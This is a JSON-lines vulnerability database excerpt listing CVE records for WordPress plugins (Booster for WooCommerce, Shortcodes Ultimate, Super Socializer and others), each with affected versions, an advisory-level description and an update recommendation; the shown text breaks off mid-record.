{"CVE_ID":"CVE-2025-1232","slug":"site-reviews","versionImpact":"7.2.4","versionEndExcluding":"7.2.5","description":"The Site Reviews WordPress plugin before 7.2.5 does not properly sanitise and escape some of its Review fields, which could allow unauthenticated users to perform Stored XSS attacks","recommendation":"Update to version 7.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c4ea8357-ddd7-48ac-80c9-15b924715b14\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c4ea8357-ddd7-48ac-80c9-15b924715b14\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1538","slug":"wp-file-manager","versionImpact":"7.2.4","versionEndExcluding":"7.2.5","description":"The File Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.2.4. This is due to missing or incorrect nonce validation on the wp_file_manager page that includes files through the 'lang' parameter. This makes it possible for unauthenticated attackers to include local JavaScript files that can be leveraged to achieve RCE via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This issue was partially patched in version 7.2.4, and fully patched in 7.2.5.","recommendation":"Update to version 7.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57cc15a6-2cf5-481f-bb81-ada48aa74009?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57cc15a6-2cf5-481f-bb81-ada48aa74009?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3051451\\\/wp-file-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3051451\\\/wp-file-manager\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12278","slug":"woocommerce-jetpack","versionImpact":"7.2.4","versionEndExcluding":"7.2.5","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via any location that typically sanitizes data using wp_kses, like comments, in all versions up to, and including, 7.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/functions\\\/wcj-functions-general.php#L1015\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/functions\\\/wcj-functions-general.php#L1015\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262569\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/functions\\\/wcj-functions-general.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262569\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/functions\\\/wcj-functions-general.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/234789db-1440-40ac-83e7-b8afb0ba4b5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/234789db-1440-40ac-83e7-b8afb0ba4b5f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9239","slug":"woocommerce-jetpack","versionImpact":"7.2.3","versionEndExcluding":"7.2.4","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 7.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4665b87-e1f8-4a73-b6d6-1d5c14067b3a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4665b87-e1f8-4a73-b6d6-1d5c14067b3a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.2.3\\\/includes\\\/settings\\\/wcj-settings-pdf-invoicing-advanced.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.2.3\\\/includes\\\/settings\\\/wcj-settings-pdf-invoicing-advanced.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.2.3\\\/includes\\\/tools\\\/class-wcj-order-statuses-tool.php#L319\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.2.3\\\/includes\\\/tools\\\/class-wcj-order-statuses-tool.php#L319\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3187178%40woocommerce-jetpack&new=3187178%40woocommerce-jetpack&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3187178%40woocommerce-jetpack&new=3187178%40woocommerce-jetpack&sfp_email=&sfph_mail=#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6766","slug":"shortcodes-ultimate-pro","versionImpact":"7.2.0","versionEndExcluding":"7.2.1","description":"The shortcodes-ultimate-pro WordPress plugin before 7.2.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 7.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/77bb1dcf-4e84-497a-955e-f3c0b649ad1c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/77bb1dcf-4e84-497a-955e-f3c0b649ad1c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3936","slug":"blog2social","versionEndExcluding":"7.2.1","description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d09a5d3-046d-47ef-86b4-c024ea09dc0f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d09a5d3-046d-47ef-86b4-c024ea09dc0f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11733","slug":"wordpress-popular-posts","versionImpact":"7.1.0","versionEndExcluding":"7.2.0","description":"The The WordPress Popular Posts plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 7.1.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 7.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popular-posts\\\/tags\\\/7.1.0\\\/src\\\/Rest\\\/ViewLoggerEndpoint.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popular-posts\\\/tags\\\/7.1.0\\\/src\\\/Rest\\\/ViewLoggerEndpoint.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c38ac8d6-c6de-4be7-bf7b-198e085a0ad2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c38ac8d6-c6de-4be7-bf7b-198e085a0ad2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5436","slug":"vertical-marquee-plugin","versionImpact":"7.1","versionEndExcluding":"7.2","description":"The Vertical marquee plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd90d9c0-0cab-4fd3-b016-106032f300f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd90d9c0-0cab-4fd3-b016-106032f300f7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vertical-marquee-plugin\\\/trunk\\\/vertical-marquee-plugin.php?rev=2827080#L170\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vertical-marquee-plugin\\\/trunk\\\/vertical-marquee-plugin.php?rev=2827080#L170\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985561\\\/vertical-marquee-plugin#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985561\\\/vertical-marquee-plugin#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2008","slug":"wp-ultimate-csv-importer","versionImpact":"7.20","versionEndExcluding":"7.19.1","description":"The Import Export Suite for CSV and XML Datafeed plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the import_single_post_as_csv() function in all versions up to, and including, 7.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to one of the following versions, or a newer patched version: 7.19.1, 7.20.1","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261521\\\/wp-ultimate-csv-importer\\\/trunk\\\/SingleImportExport.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261521\\\/wp-ultimate-csv-importer\\\/trunk\\\/SingleImportExport.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a114faf9-cada-4132-abe3-c0137b66e276?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a114faf9-cada-4132-abe3-c0137b66e276?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2007","slug":"wp-ultimate-csv-importer","versionImpact":"7.20","versionEndExcluding":"7.19.1","description":"The Import Export Suite for CSV and XML Datafeed plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the deleteImage() function in all versions up to, and including, 7.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to one of the following versions, or a newer patched version: 7.19.1, 7.20.1","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261521\\\/wp-ultimate-csv-importer\\\/trunk\\\/MediaHandling.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261521\\\/wp-ultimate-csv-importer\\\/trunk\\\/MediaHandling.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3923c732-80b5-4a04-80dd-b4d5b5e5567d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3923c732-80b5-4a04-80dd-b4d5b5e5567d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13230","slug":"super-socializer","versionImpact":"7.14","versionEndExcluding":"7.14.1","description":"The Social Share, Social Login and Social Comments Plugin \u2013 Super Socializer plugin for WordPress is vulnerable to Limited SQL Injection via the \u2018SuperSocializerKey\u2019 parameter in all versions up to, and including, 7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional values into the already existing query that can be used to extract user metadata from the database.","recommendation":"Update to version 7.14.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/super-socializer\\\/trunk\\\/super_socializer.php#L291\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/super-socializer\\\/trunk\\\/super_socializer.php#L291\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225440\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225440\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d7b2a7f-3c67-4df1-bb15-e7f4f0035953?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d7b2a7f-3c67-4df1-bb15-e7f4f0035953?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9946","slug":"super-socializer","versionImpact":"7.13.68","versionEndExcluding":"7.14","description":"The Social Share, Social Login and Social Comments Plugin \u2013 Super Socializer plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 7.13.68. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, if they have access to the email and the user does not have an already-existing account for the service returning the token. An attacker cannot authenticate as an administrator by default, but these accounts are also at risk if authentication for administrators has explicitly been allowed via the social login. The vulnerability was partially patched in version 7.13.68.","recommendation":"Update to version 7.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c394b8b6-b7f6-4ba7-8a2b-98160cc286a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c394b8b6-b7f6-4ba7-8a2b-98160cc286a8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172935\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172935\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180581\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180581\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2779","slug":"super-socializer","versionEndExcluding":"7.13.52","description":"The Social Share, Social Login and Social Comments WordPress plugin before 7.13.52 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe9b7696-3b0e-42e2-9dbc-55167605f5c5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe9b7696-3b0e-42e2-9dbc-55167605f5c5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0082","slug":"google-analytics-dashboard-for-wp","versionEndExcluding":"7.12.1","description":"The ExactMetrics WordPress plugin before 7.12.1 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1ba5047-0c39-478f-89c7-b0bb638efdff\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1ba5047-0c39-478f-89c7-b0bb638efdff\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4575","slug":"LayerSlider","versionImpact":"7.11.0","versionEndExcluding":"7.11.1","description":"The LayerSlider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ls_search_form shortcode in version 7.11.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.11.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fa4167a-686f-4fd0-a53d-eb61d57228a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fa4167a-686f-4fd0-a53d-eb61d57228a1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/layerslider.com\\\/release-log\\\/\",\"name\":\"https:\\\/\\\/layerslider.com\\\/release-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7422","slug":"theme-my-login","versionImpact":"7.1.7","versionEndExcluding":"7.1.8","description":"The Theme My Login plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.1.7. This is due to missing or incorrect nonce validation on the tml_admin_save_ms_settings() function. This makes it possible for unauthenticated attackers to update the theme's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Please note that this only affects multi-site instances.","recommendation":"Update to version 7.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb8e956-3a95-4e55-9816-be7eddb5835d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb8e956-3a95-4e55-9816-be7eddb5835d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3135854\\\/theme-my-login\\\/trunk\\\/admin\\\/settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3135854\\\/theme-my-login\\\/trunk\\\/admin\\\/settings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7758","slug":"stylish-price-list","versionImpact":"7.1.7","versionEndExcluding":"7.1.8","description":"The Stylish Price List  WordPress plugin before 7.1.8 does not sanitise and escape some of its settings, which could allow high privilege users of contributor and above to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 7.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0bf39a29-a605-407b-9ab0-a82437d16153\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0bf39a29-a605-407b-9ab0-a82437d16153\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4821","slug":"shortcodes-ultimate","versionImpact":"7.1.6","versionEndExcluding":"7.1.7","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's su_lightbox shortcode in all versions up to, and including, 7.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec7649da-5358-4fe2-8706-b945bba02c93?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec7649da-5358-4fe2-8706-b945bba02c93?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.1.5\\\/includes\\\/shortcodes\\\/lightbox.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.1.5\\\/includes\\\/shortcodes\\\/lightbox.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096024%40shortcodes-ultimate%2Ftrunk&old=3084162%40shortcodes-ultimate%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096024%40shortcodes-ultimate%2Ftrunk&old=3084162%40shortcodes-ultimate%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1054","slug":"woocommerce-jetpack","versionImpact":"7.1.6","versionEndExcluding":"7.1.7","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's \r\n'wcj_product_barcode' shortcode in all versions up to, and including, 7.1.6 due to insufficient input sanitization and output escaping on user supplied attributes like 'color'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0b86c45-c346-4df7-844e-01de027bbc1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0b86c45-c346-4df7-844e-01de027bbc1e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034358%40woocommerce-jetpack&new=3034358%40woocommerce-jetpack&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034358%40woocommerce-jetpack&new=3034358%40woocommerce-jetpack&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4553","slug":"shortcodes-ultimate","versionImpact":"7.1.5","versionEndExcluding":"7.1.6","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_members' shortcode in all versions up to, and including, 7.1.5 due to insufficient input sanitization and output escaping on user supplied 'color' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8db8ed5-ebeb-4102-928f-fe417e429ad2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8db8ed5-ebeb-4102-928f-fe417e429ad2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.1.4\\\/includes\\\/shortcodes\\\/members.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.1.4\\\/includes\\\/shortcodes\\\/members.php#L83\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084162\\\/#file524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084162\\\/#file524\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4217","slug":"shortcodes-ultimate-pro","versionImpact":"7.1.4","versionEndExcluding":"7.1.5","description":"The shortcodes-ultimate-pro WordPress plugin before 7.1.5 does not properly escape some of its shortcodes' settings, making it possible for attackers with a Contributor account to conduct Stored XSS attacks.","recommendation":"Update to version 7.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55cb43bf-7c8f-4df7-b4de-bf2bb1c2766d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55cb43bf-7c8f-4df7-b4de-bf2bb1c2766d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3550","slug":"shortcodes-ultimate","versionImpact":"7.1.2","versionEndExcluding":"7.1.3","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 7.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf7b0f1b-a6d3-4a96-adaa-0adeb6ea2efd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf7b0f1b-a6d3-4a96-adaa-0adeb6ea2efd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/functions-html.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/functions-html.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/lightbox.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/lightbox.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/service.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/service.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/dailymotion.php#L141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/dailymotion.php#L141\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069959%40shortcodes-ultimate%2Ftrunk&old=3069892%40shortcodes-ultimate%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069959%40shortcodes-ultimate%2Ftrunk&old=3069892%40shortcodes-ultimate%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5638","slug":"woocommerce-jetpack","versionImpact":"7.1.2","versionEndExcluding":"7.1.3","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wcj_image' shortcode in versions up to, and including, 7.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.1.3, or a newer patched 